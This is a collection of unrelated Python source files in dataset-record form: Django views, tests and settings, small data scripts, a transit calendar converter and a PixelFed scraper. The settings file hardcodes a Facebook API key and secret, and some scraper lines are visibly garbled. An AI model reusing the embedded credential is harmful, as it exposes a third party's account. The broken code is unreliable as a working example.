e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\n\ndef arrayIntochar(array):\n # char = array.join(\"|\")\n char = ','.join(array)\n return char\n\ndef charIntoarray(char):\n if char == \"\":\n return []\n array = char.split(\",\")\n return array\ndef postFileList(request):\n if request.method ==\"POST\":\n Data=[]\n try:\n success = True\n arrays = json.loads(request.body)\n # for array in arrays:\n # id = array['id']\n # if (id[0:6]==\"_fake_\"):\n # File.objects.filter(filename__contains=\"_fake_\").delete() #一检测到就删除然后跳出循环\n # continue\n for array in arrays:\n id = array['id']\n group = array['group']\n if (id[0:6]==\"_fake_\"):\n fakeinfo = File.objects.filter(filename__contains=\"_fake_\")\n result = 0\n for fake in fakeinfo: #防止重复\n oldgroup = fake.group\n if (oldgroup==arrayIntochar(group)):\n result = 1\n continue\n if (result ==1):\n continue\n filename = \"_fake_\"+hash_code(str(datetime.datetime.now()))\n File.objects.create(filename=filename,group=arrayIntochar(group),createDate=datetime.datetime.now(),type=\"folder\")\n #更新权限表的问题\n filename_id = File.objects.all().order_by('-id')[0].id\n print(filename_id)\n Userinfo = User.objects.all()\n for authlist in Userinfo:\n File_User.objects.create(filename_id=filename_id,username_id=authlist.id) #创建文件夹权限表\n\n else:\n File.objects.filter(id=id).update(group=arrayIntochar(group)) #group全量更新\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"Data\":Data})\n\ndef deleteFolder(request):\n if request.method ==\"POST\":\n Data=[]\n try:\n success = True\n infos = json.loads(request.body)\n for info in infos:\n id = info['id']\n print(id)\n file = File.objects.get(filename=id)\n File_User.objects.filter(filename_id=file.id).delete()\n File.objects.filter(filename=id).delete()\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n","sub_path":"Project/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":48571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"343257420","text":"import os\nimport csv\nimport pygal\nlis = []\nusecal = 5\ndef openfile():\n with open('csvfile/job.csv') as csvfile:\n file1 = csv.reader(csvfile)\n print('open Success')\n usefile(list(file1))\ndef usefile(file1):\n data1 = []\n xlabel = [i[0] for i in file1[1:]]\n for i in range(1, 5):\n head = file1[0][i]\n lisskill = [row[i] for row in file1[1:]]\n summ = list(map(lambda x: int(x.replace(',','')), lisskill))\n data1.append([head, summ])\n chart(data1, xlabel)\ndef chart(data, label):\n want = 10\n line_chart = pygal.StackedBar()\n line_chart.title = 'skill want top 10'\n line_chart.x_labels = label[:want]\n for i, j in data:\n line_chart.add(i, j[:want])\n line_chart.render_to_file('img/allskillwant2.svg')\nopenfile()","sub_path":"script/allskillwant.py","file_name":"allskillwant.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"601285908","text":"\nclass FullSqure(object):\n \"\"\"\n 求完全平方数\n \"\"\"\n def getFromZeroToMax(self, max_range:int=10000)->list:\n \"\"\"\n 求max_range 范围内的所有完全平方数\n \"\"\"\n res = []\n for i in range(max_range//2):\n if i*i <= max_range:\n res.append(i)\n\n return res\n \n def getFromMaxToZero(self,max_range:int=10000)->list:\n \"\"\"\n 求max_range内的所有完全平方数(从max开始进行开平方校验)\n \"\"\"\n res = []\n \n return res\n\n","sub_path":"full_squre/full_squre.py","file_name":"full_squre.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"556457003","text":"from django.test import Client, TestCase\nfrom django.contrib.auth.models import User\nfrom orders.models import *\n\n# Create your tests here.\n\nclass OrdersTestCase(TestCase):\n\n def setUp(self):\n user = User.objects.create_user(username='test_user', password='password')\n order = Order.objects.create(user=user)\n d = MenuDish.objects.create(name=\"dish\")\n mi1 = MenuItem.objects.create(name=\"plate\", dish=d)\n i1 = OrderItem.objects.create(item=mi1)\n\n\n def test_orders_page(self):\n user = User.objects.get(username='test_user')\n c = Client()\n c.force_login(user)\n response = c.get(\"/orders/\")\n self.assertEqual(response.status_code, 200)\n\n\n def test_order_page(self):\n user = User.objects.get(username='test_user')\n order = Order.objects.get(user=user)\n c = Client()\n c.force_login(user)\n response = c.get(f\"/orders/{order.id}\")\n self.assertEqual(response.status_code, 200)\n\n\n def test_new_order(self):\n user = User.objects.get(username='test_user')\n order = Order.objects.get(user=user)\n c = Client()\n c.force_login(user)\n\n response = c.get(f\"/orders/new\", follow=True)\n self.assertEqual(response.redirect_chain, [('/orders/1', 302)])\n\n order.paid = True;\n order.save()\n response = c.get(f\"/orders/new\", follow=True)\n self.assertEqual(response.redirect_chain, [('/orders/2', 302)])\n\n\n def test_choose_item(self):\n user = User.objects.get(username='test_user')\n order = Order.objects.get(user=user)\n c = Client()\n c.force_login(user)\n response = c.get(f\"/orders/choose_item\")\n self.assertEqual(response.status_code, 200)\n\n order.paid = True;\n order.save()\n response = c.get(f\"/orders/choose_item\", follow=True)\n self.assertEqual(response.redirect_chain, [('/orders/', 302)])\n\n\n def test_order_payment(self):\n user = User.objects.get(username='test_user')\n order = Order.objects.get(user=user)\n c = Client()\n c.force_login(user)\n response = c.post(f\"/orders/pay\", follow=True)\n self.assertEqual(response.redirect_chain, [('/orders/1', 302)])\n\n item = OrderItem.objects.get(id=1)\n order.items.add(item)\n response = c.post(f\"/orders/pay\", follow=True)\n order = Order.objects.get(user=user)\n self.assertTrue(order.paid)\n self.assertEqual(response.redirect_chain, [('/orders/', 302)])\n\n","sub_path":"orders/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"199159731","text":"import os\nimport tempfile\n\n# connect to mongo using settings defined in mongoconnection module\n# - this way it is completely independent of django's settings`\nfrom mongoconnection import connect\nconnect()\n\nTWEET_CRAWLER_URL = \"http://localhost:8081/\"\nTWEET_CRAWLER_TIMEOUT = 1\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nJS_DEBUG = DEBUG\n\n_tempdir = tempfile.tempdir or '/tmp'\nROOT_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n\nADMINS = ()\nMANAGERS = ADMINS\nDATABASES = {}\n\nTIME_ZONE = 'Europe/Warsaw'\nLANGUAGE_CODE = 'en-us'\nSITE_ID = 1\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nMEDIA_ROOT = ''\nMEDIA_URL = ''\nSTATIC_ROOT = os.path.join(ROOT_DIR, '..', 'collected_static')\n\nSTATIC_URL = '/static/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n os.path.join(ROOT_DIR, '..', 'static'),\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder'\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = ''\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'citypulse.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'citypulse.wsgi.application'\n\nTEMPLATE_DIRS = (\n \"templates\",\n os.path.join(ROOT_DIR, '..', 'templates'),\n)\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',\n 'LOCATION': os.path.join(_tempdir, 'citypulse__file_based_cache'),\n }\n}\nSESSION_ENGINE = 'django.contrib.sessions.backends.cache'\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n\n 'pipeline',\n 'south',\n 'bootstrap',\n\n 'citypulse.main',\n 'citypulse.clustering',\n 'citypulse.api',\n 'citypulse.fbcrawler',\n)\n\nSOUTH_TESTS_MIGRATE = False\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\nPIPELINE_CSS = {\n 'bootstrap': {\n 'source_filenames': (\n 'less/bootstrap/bootstrap.less',\n 'less/base.less',\n ),\n 'output_filename': 'css/bootstrap.css',\n 'extra_context': {\n 'rel': 'stylesheet/less',\n },\n },\n 'bootstrap-responsive': {\n 'source_filenames': (\n 'less/bootstrap/responsive.less',\n ),\n 'output_filename': 'css/bootstrap-responsive.css',\n 'extra_context': {\n 'rel': 'stylesheet/less',\n },\n },\n\n}\n\nPIPELINE_JS = {\n 'main': {\n 'source_filenames': (\n 'js/main/init.js',\n 'js/maps/models.coffee',\n 'js/maps/views.coffee',\n 'js/markerclusterer.js',\n 'js/styledmarker.js',\n 'js/maps/controller.coffee',\n 'js/main/initcontroller.js',\n ),\n 'output_filename': 'js/main.js'\n },\n 'core': {\n 'source_filenames': (\n 'js/jquery-1.7.2.js',\n 'js/ejs.js',\n 'js/view.js',\n 'js/underscore.js',\n 'js/json2.js',\n 'js/backbone.js',\n 'js/bootstrap.js',\n 'js/init.js',\n 'js/markerclusterer.js',\n ),\n 'output_filename': 'js/core.min.js',\n },\n 'less': {\n 'source_filenames': (\n 'js/less-1.3.0.js',\n ),\n 'output_filename': 'js/less.min.js',\n },\n}\n\nPIPELINE = not DEBUG\nif PIPELINE:\n STATICFILES_STORAGE = 'pipeline.storage.PipelineCachedStorage'\n\nPIPELINE_COMPILERS = (\n 'pipeline.compilers.coffee.CoffeeScriptCompiler',\n 'pipeline.compilers.less.LessCompiler',\n)\nPIPELINE_LESS_BINARY = \"lessc\"\nPIPELINE_YUI_BINARY = os.path.join(ROOT_DIR, '..', 'bin', 'yuicompressor.sh')\nPIPELINE_COFFEE_SCRIPT_BINARY = os.path.join(ROOT_DIR, '..', 'bin', 'coffeefinder.sh')\n\nPIPELINE_TEMPLATE_FUNC = 'new EJS'\nPIPELINE_TEMPLATE_NAMESPACE = 'window.Template'\nPIPELINE_TEMPLATE_EXT = '.ejs'\n\n\nFACEBOOK_API_KEY = '277478075671648'\nFACEBOOK_API_SECRET = 'a2a3e31634e0f62b9e618c398ce10033'\n","sub_path":"citypulse/settings/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"159297861","text":"# coding: utf-8\n\nimport urllib2\nimport re\nimport message_box\nfrom ast import literal_eval\n\nclass InfoExtractor():\n \"\"\" Extractor Information class for PixelFed\n\n PixelFed InfoExtractor that, given url, extract information about the\n image (or images) the URL refers to. This information includes the real\n image URL, the image title, author and others. The information is stored\n in a list of dictionary.\"\"\"\n\n def __init__(self, url, verbose) :\n self.url = url\n self.print_ = message_box.print_(verbose)\n self.hdr = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}\n self.result_list = []\n self.raw_informations = None\n self.info_dictionary = {\n 'username' : None,\n 'author' : None,\n 'profile_url' : None,\n 'is_several_images' : False,\n 'id' : None,\n 'title' : None,\n 'format' : \".jpg\", #All images from instagram are jpg\n 'description' : None,\n 'comments' : None,\n 'date' : None,\n 'localization' : None,\n 'real_urls_and_dimensions' : [], # list of urls and dimensions(W-H),\n 'like_nb' : None,} # ex : [[\"url1\", 1080, 1080],[\"url2\", 640, 640]]\n\n def get_informations(self) :\n if self.get_type_link(self.url) == \"post\" :\n self.raw_informations = self.download_post_informations(self.url)\n self.get_information_single_image(self.raw_informations)\n elif self.get_type_link(self.url) == \"account\" :\n self.info_dictionary['is_several_images'] = True\n self.raw_informations, list_urls = self.download_account_informations(\n self.atom_link(self.url))\n self.get_information_many_images(self.raw_informations, list_urls)\n elif self.get_type_link(self.url) == \"undeterminate\" :\n return \"Error : Url is not valid\"\n return self.result_list\n\n def get_type_link(self, url) :\n \"\"\" Return type url from Instagram : many images (acount) or single image\n or undeterminate. The determination find in url.\"\"\"\n url_post_re = r\"(https|http):\\/\\/(\\w+\\.|)([a-zA-Z0-9_-]+)\\.(bzh|org|social|fr|com|net|ru|cc)/p/([a-zA-Z0-9_-]+)/(\\w+)\"\n url_account_re = r\"(https|http):\\/\\/(\\w+\\.|)([a-zA-Z0-9_-]+)\\.(bzh|org|social|fr|com|net|ru|cc)/(\\w+)$\"\n if re.match(url_post_re, url) is not None :\n return \"post\"\n elif re.match(url_account_re, url) is not None :\n return \"account\"\n else : return \"undeterminate\"\n\n def atom_link(self, url) :\n return re.sub(\n r\"(?P(https|http):\\/\\/(\\w+\\.|)([a-zA-Z0-9_-]+)\\.(bzh|org|social|fr|com|net|ru|cc)/)(?P([a-zA-Z0-9_-]+))\",\n r\"\\gusers/\\g.atom\",\n url)\n\n def download_post_informations(self, url) :\n \"\"\" Download the source code of webpage from a post-url.\n Return all webpage source code.\"\"\"\n request = urllib2.Request(url, headers=self.hdr)\n fh = urllib2.urlopen(request)\n source_code = fh.read()\n return source_code\n\n def download_account_informations(self, url) :\n \"\"\" Download the source code of webpage from an account-url.\n Return a list of source post-url pages.\"\"\"\n # Download feed webpage\n request = urllib2.Request(url, headers=self.hdr)\n fh = urllib2.urlopen(request)\n source_code = fh.read()\n # List the url of post\n List_of_posts_urls = []\n end = 0\n for i in range(source_code.count('\\n', start)\n List_of_posts_urls.append(source_code[start:end])\n # Download the post informations page\n List_informations = []\n for i, url in enumerate(List_of_posts_urls) :\n self.print_.dynamic([\"pixelfed\",\n url[url.rfind('/')+1:] if url[len(url)-1] != \"/\" else url[url[:-1].rfind('/')+1:-1],\n \"Downloading picture info webpage\",\n \"{0} of {1}\".format(i+1, len(List_of_posts_urls))])\n List_informations.append(self.download_post_informations(url))\n\n return List_informations, List_of_posts_urls\n\n def get_information_single_image(self, webpage_info) :\n \"\"\" Complete the dictionary with information of code source webpage.\n The result is locate in a list of result (result list) in the form\n of dictionary.\"\"\"\n self.info_dictionary['username'] = self.find_info(webpage_info, 'status-username=')\n self.info_dictionary['author'] = self.find_info(webpage_info, 'status-username=')\n self.info_dictionary['profile_url'] = self.find_info(webpage_info, 'status-avatar=')\n self.info_dictionary['id'] = self.find_info(webpage_info, 'status-id=')\n title, description = self.get_title_and_description(webpage_info)\n self.info_dictionary['title'] = title\n self.info_dictionary['description'] = description\n #self.info_dictionary['comments'] = \n #self.info_dictionary['localization'] = \n self.info_dictionary['real_urls_and_dimensions'].append(\n [self.find_info(webpage_info, '\": (0, +1)}\nfor y, line in enumerate(reversed(lines)):\n\tfor x, char in enumerate(line):\n\t\tif char in dirs:\n\t\t\tblizzards.append(Blizzard((y, x), dirs[char]))\n\t\t\tvalley[y][x] = 1\n\t\telif char == \"#\":\n\t\t\tvalley[y][x] = -1\n\npos_start = (h-1, valley[h-1].index(0))\npos_goal = (0, valley[0].index(0))\n\nprint(\n\treach_goal(pos_start, pos_goal, blizzards, valley) + \n\treach_goal(pos_goal, pos_start, blizzards, valley) + \n\treach_goal(pos_start, pos_goal, blizzards, valley)\n)\n","sub_path":"2022/day24/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"645380202","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n'''\r\nCreated on 2019年9月1日\r\ncreate unique id of user and author\r\n\r\n@author: Administrator\r\n'''\r\nimport pandas\r\nimport numpy\r\nfrom boltons.setutils import IndexedSet\r\n\r\ntrack1 = pandas.read_csv('../input/final_track1_train.txt', sep='\\t', iterator=True)\r\nprint(track1)\r\n\r\nidset = []\r\nLoop = True\r\nwhile Loop:\r\n try:\r\n track = track1.get_chunk(1e8).values\r\n track = track[:, [0, 3]]\r\n print(track)\r\n \r\n idset.append(numpy.unique(track.flatten()))\r\n \r\n except StopIteration:\r\n Loop = False\r\n print('stop iteration')\r\n\r\nids = numpy.unique(numpy.concatenate(idset)) \r\nprint(ids)\r\n\r\ntrack2 = pandas.read_csv('../input/final_track2_train.txt', sep='\\t').values\r\ntrack2 = track2[:, [0, 3]]\r\nprint(track2)\r\nids = numpy.unique(numpy.concatenate((track2.flatten(), ids)))\r\nnumpy.savez_compressed('../numpy/id.npz', id=ids)\r\nprint('done')\r\n\r\n","sub_path":"network/make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"163260193","text":"#!/usr/bin/python3\r\n# student: J.F.P. (Richard) Scholtens\r\n# studentnr.: s2956586\r\n# datum: 28/05/2019\r\n# This program restructures the pairCounts file to a more\r\n# efficient format. It does so by only storing the resources\r\n# with the highest frequency of anchors to a pickle file.\r\n\r\nimport pickle\r\n\r\n\r\ndef restructure(entity):\r\n \"\"\"Changes the spaces of the string into underscores and\r\n then capatalizes the string. It then returns the string.\"\"\"\r\n return entity.replace(\" \", \"_\").lower().capitalize()\r\n\r\n\r\ndef to_pickle(text_file):\r\n \"\"\"Opens a file wich is structured as following:\r\n ########################\r\n Entity TAB URL TAB Frequency\r\n ########################\r\n It then takes out all information which is seperated by tabs.\r\n After this it puts it in a dictionary where the entity is the key.\r\n The value holds a tuple with the resource URL and frequency.\"\"\"\r\n dic = {}\r\n with open(text_file, 'r') as f:\r\n for line in f.readlines():\r\n line = line.strip().split(\"\\t\")\r\n entity = restructure(line[0])\r\n try:\r\n if dic[entity]:\r\n val = dic[entity]\r\n if int(line[2]) > val[1]:\r\n dic[entity] = (line[1], line[2])\r\n except:\r\n dic[entity] = (line[1], int(line[2]))\r\n with open(text_file + '.pickle', 'wb') as f2:\r\n pickle.dump(dic, f2)\r\n\r\n\r\ndef main():\r\n to_pickle('pairCounts')\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"pairCounts_to_pickle.py","file_name":"pairCounts_to_pickle.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"284923948","text":"# -*- coding: iso-8859-15 -*-\n'''\nVISUM add-in Import Google Transit Feed\n\nDate: 22.05.2014\nAuthor: Dimitri Krutik\nContact: Dimitri.Krutik@ptvgroup.com\nCompany: PTV AG'''\n\nfrom datetime import date\nimport GoogleTransitImport.Operations as op\nfrom GoogleTransitImport import GoogleTransitExceptions as ex\nfrom GoogleTransitImport.Calendar import Period\nfrom GoogleTransitImport.TransitDataImporter.DataConverter.ConverterBase import ConverterBase\n\nclass CalendarPeriodConverter(ConverterBase):\n \"\"\"\n Parse the \"calendar.txt\" and \"calendar_dates.txt\" files.\n Determine the calendar period for service, form date - to date.\n Set the calendar period in worker.\n Create the valid days of service.\n \"\"\"\n\n # VISUM definitions\n __serviceAvailable = u'1'\n __serviceNotAvailable = u'0'\n\n # GoogleTransit definitions\n __serviceAdded = u'1'\n __serviceRemoved = u'2'\n\n __weekDays = [\"monday\", \"tuesday\", \"wednesday\", \"thursday\", \"friday\", \"saturday\", \"sunday\"]\n\n def __init__(self):\n super(CalendarPeriodConverter, self).__init__()\n self.__serviceIdToValidDaysVector = None\n self.__serviceIdToValidDaysVector = None\n self.__period = None\n self.__never = \"\"\n\n def _initializeDataForExecution(self, worker):\n super(CalendarPeriodConverter, self)._initializeDataForExecution(worker)\n self.__serviceIdToValidDaysVector = dict()\n\n def _resetLocalData(self):\n super(CalendarPeriodConverter, self)._resetLocalData()\n self.__serviceIdToValidDaysVector = None\n self.__period = None\n self.__never = \"\"\n\n def _checkRequiredFiles(self, worker):\n if worker.Files.calendarfile == None and worker.Files.datesfile == None:\n mess = _(\"The files '%s' and '%s' are missing. At least one of the files is required.\").decode(\"iso-8859-15\") % (worker.Files.CalendarFileName, worker.Files.DatesFileName)\n raise ex.RequiredFileMissed(mess)\n\n def _startConversion(self):\n message = _(\"Processing valid days\").decode(\"iso-8859-15\")\n self._worker.UpdateProgressDialog(message)\n\n self.__parseServiceDates()\n self.__saveServiceDates()\n\n def __parseServiceDates(self):\n self.__determineCalendarPeriod()\n self.__loadValidDays()\n\n def __saveServiceDates(self):\n self.__saveCalendarPeriod()\n self.__saveValidDays()\n\n def __saveCalendarPeriod(self):\n # save calendar in worker for future using\n self._worker.Period = self.__period\n\n # create Period\n calperiod = self._netObjectFactory.CreateCalendarPeriod(calType = 3,\n validFrom = self.__period.StartDateString(),\n validUntil = self.__period.EndDateString())\n\n self._visumTables.AddCalendarPeriodEntry(calperiod)\n\n\n def __saveValidDays(self):\n for serviceId, validDaysVect in self.__serviceIdToValidDaysVector.iteritems():\n valDays = self._netObjectFactory.CreateValidDays(name = serviceId,\n code = serviceId,\n dayVector = validDaysVect)\n\n self._visumTables.AddValidDaysEntry(serviceId, valDays)\n\n @classmethod\n def __createDefaultValidDaysString(cls, periodLength):\n return u\"0\" * periodLength\n\n def __getDefaultValidDaysVector(self):\n return list(self.__never)\n\n def __determineCalendarPeriod(self):\n \"\"\"Read the Period Period defined in the Google Transit files.\"\"\"\n minDate, maxDate = self.__getMinAndMaxCalendarDates()\n\n self.__period = Period(minDate, maxDate)\n self.__never = self.__createDefaultValidDaysString(self.__period.length)\n\n\n def __getMinAndMaxCalendarDates(self):\n \"\"\"Find the calendar period defined in 'calendar' and 'calendar_dates' files.\n Pass through the files to determine min and max dates.\n\n @return: the absolute minimum and maximum dates of the period\"\"\"\n initialMinDate = date.max\n initialMaxDate = date.min\n\n mindate, maxdate = self.__getMinAndMaxDatesFromCalendarFile(initialMinDate, initialMaxDate)\n mindate, maxdate = self.__getMinAndMaxDatesFromDatesFile(mindate, maxdate)\n\n # Check, if we found a calendar dates\n if mindate == initialMinDate:\n mess = _(\"No calendar dates were found.\").decode(\"iso-8859-15\")\n raise ex.GoogleTransitException(mess)\n\n return mindate, maxdate\n\n\n def __getMinAndMaxDatesFromCalendarFile(self, initMin, initMax):\n \"\"\"Find the calendar period defined in the 'calendar' file.\n @return: the absolute minimum and maximum dates\"\"\"\n mindate = initMin\n maxdate = initMax\n\n if self._worker.Files.calendarfile:\n\n with self._worker.OpenCSVFile(self._worker.Files.calendarfile) as csvReader:\n try:\n for record in csvReader:\n start = op.MakeDate(self._readRequiredAttribute(record, \"start_date\"))\n end = op.MakeDate(self._readRequiredAttribute(record, \"end_date\"))\n maxdate = max(maxdate, end)\n mindate = min(mindate, start)\n\n except ex.ExecutionCanceled:\n raise\n\n except Exception as e:\n mess = self._createDefaultReadFileExceptionMessage(self._worker.Files.CalendarFileName)\n raise ex.GoogleTransitException(mess, e)\n\n return mindate, maxdate\n\n def __getMinAndMaxDatesFromDatesFile(self, initMin, initMax):\n \"\"\"Find the calendar period defined in the 'calendar_dates' file.\n @return: the absolute minimum and maximum dates\"\"\"\n mindate = initMin\n maxdate = initMax\n\n if self._worker.Files.datesfile:\n\n with self._worker.OpenCSVFile(self._worker.Files.datesfile) as csvReader:\n try:\n for record in csvReader:\n thedate = op.MakeDate(self._readRequiredAttribute(record, \"date\"))\n maxdate = max(maxdate, thedate)\n mindate = min(mindate, thedate)\n\n except ex.ExecutionCanceled:\n raise\n\n except Exception as e:\n mess = self._createDefaultReadFileExceptionMessage(self._worker.Files.DatesFileName)\n raise ex.GoogleTransitException(mess, e)\n\n return mindate, maxdate\n\n\n def __loadValidDays(self):\n self.__loadValidDaysFromCalendarFile()\n self.__loadValidDaysExceptionsFromDatesFile()\n\n def __loadValidDaysFromCalendarFile(self):\n if self._worker.Files.calendarfile == None:\n return\n\n with self._worker.OpenCSVFile(self._worker.Files.calendarfile) as csvReader:\n try:\n for record in csvReader:\n endDate = op.MakeDate(self._readRequiredAttribute(record, \"end_date\"))\n startDate = op.MakeDate(self._readRequiredAttribute(record, \"start_date\"))\n validDaysOfWeekVect = self.__getValidDaysOfWeek(record)\n\n validDaysVect = self.__createValidDaysVector(validDaysOfWeekVect,\n startDate,\n endDate)\n\n serviceId = op.MakeSafeString(self._readRequiredAttribute(record, \"service_id\"))\n self.__serviceIdToValidDaysVector[serviceId] = validDaysVect\n\n except ex.ExecutionCanceled:\n raise\n\n except Exception as e:\n mess = self._createDefaultReadFileExceptionMessage(self._worker.Files.CalendarFileName)\n raise ex.GoogleTransitException(mess, e)\n\n\n def __createValidDaysVector(self, validDaysOfWeekVect, startDate, endDate):\n \"\"\"Create the vector with valid days for the whole period.\n Interpolate valid days of the week to the period between start and end dates.\"\"\"\n fromDayIndex = self.__period.DayIndexFromPeriodBegin(startDate.toordinal())\n toDayIndex = self.__period.DayIndexFromPeriodBegin(endDate.toordinal())\n\n validDaysVect = self.__getDefaultValidDaysVector()\n dayOfWeek = startDate.weekday() # Monday = 0, Tuesday = 1, ...\n\n for i in xrange(fromDayIndex, toDayIndex + 1):\n validDaysVect[i] = validDaysOfWeekVect[dayOfWeek]\n dayOfWeek = self.__getDayOfWeek(dayOfWeek + 1)\n\n return validDaysVect\n\n def __getValidDaysOfWeek(self, record):\n \"\"\"Get the vector with valid days of the week\"\"\"\n weekVect = []\n for weekDay in self.__weekDays:\n attrVal = self._readRequiredAttribute(record, weekDay)\n weekVect.append(attrVal)\n\n return weekVect\n\n @classmethod\n def __getDayOfWeek(cls, dayCount):\n return dayCount % 7\n\n def __loadValidDaysExceptionsFromDatesFile(self):\n if self._worker.Files.datesfile == None:\n return\n\n with self._worker.OpenCSVFile(self._worker.Files.datesfile) as csvReader:\n try:\n exRecorder = ValidDaysExceptionRecorder()\n\n for record in csvReader:\n serviceId = op.MakeSafeString(self._readRequiredAttribute(record, \"service_id\"))\n\n if exRecorder.IsNewServiceIdFound(serviceId):\n currentValidDayVect = self.__getOrCreateValidDaysVector(serviceId)\n exRecorder.StartRecordNewValidDaysVector(serviceId,\n currentValidDayVect)\n\n dateAttr = self._readRequiredAttribute(record, \"date\")\n dayIndex = self.__getCalendarDayIndexFromDateStr(dateAttr)\n\n exTypeAttr = self._readRequiredAttribute(record, \"exception_type\")\n isServiceAvalable = self.__isServiceAvailable(exTypeAttr)\n\n exRecorder.SetExceptionForDay(dayIndex, isServiceAvalable)\n\n except ex.ExecutionCanceled:\n raise\n\n except Exception as e:\n mess = self._createDefaultReadFileExceptionMessage(self._worker.Files.DatesFileName)\n raise ex.GoogleTransitException(mess, e)\n\n\n def __isServiceAvailable(self, exceptionType):\n if self.__isServiceAdded(exceptionType):\n return self.__serviceAvailable\n else:\n return self.__serviceNotAvailable\n\n def __isServiceAdded(self, exceptionType):\n return exceptionType == self.__serviceAdded\n\n def __getOrCreateValidDaysVector(self, serviceId):\n \"\"\"Get an already existing valid days vector, or default one.\"\"\"\n validDayVector = self.__serviceIdToValidDaysVector.get(serviceId, None)\n\n if not validDayVector:\n validDayVector = self.__getDefaultValidDaysVector()\n self.__serviceIdToValidDaysVector[serviceId] = validDayVector\n\n return validDayVector\n\n def __getCalendarDayIndexFromDateStr(self, dateStr):\n dayIndex = op.DateStringToDayIndex(dateStr)\n return self.__period.DayIndexFromPeriodBegin(dayIndex)\n\n\nclass ValidDaysExceptionRecorder(object):\n \"\"\"\n The class records exceptions (from regular service schedule)\n into ValidDays vector. It gets the ValidDays vector and override\n the service at specific date.\n \"\"\"\n def __init__(self):\n self.__currentValidDaysVect = None\n self.__currentServiceId = None\n\n def StartRecordNewValidDaysVector(self, serviceId, validDaysVect):\n self.__currentValidDaysVect = validDaysVect\n self.__currentServiceId = serviceId\n\n def IsNewServiceIdFound(self, serviceId):\n \"\"\"\n Check, if new service id (different from the current service id) is found.\n \"\"\"\n return serviceId != self.__currentServiceId\n\n def SetExceptionForDay(self, calendarDay, isServiceAvalable):\n \"\"\"Set the new value (is service available or not) for specific date\"\"\"\n self.__currentValidDaysVect[calendarDay] = isServiceAvalable\n","sub_path":"GoogleTransitImport/TransitDataImporter/DataConverter/CalendarPeriodConverter.py","file_name":"CalendarPeriodConverter.py","file_ext":"py","file_size_in_byte":12293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"461104291","text":"import urllib\nimport random\nimport sys\nimport os\nfrom view import View\nfrom question import Question\n\nclass Exercise:\n def __init__(self, wordfile):\n self.view = View()\n self.done = set()\n self.wordfile = wordfile\n self.wordlist = []\n self.remove = False\n self.number = 1\n self.score = {\n \"correct\": 0,\n \"wrong\": 0\n }\n\n def setRemove(self,remove):\n self.remove = remove\n return self\n\n def choice(self):\n if len(self.wordlist) == 0:\n with open(self.wordfile, 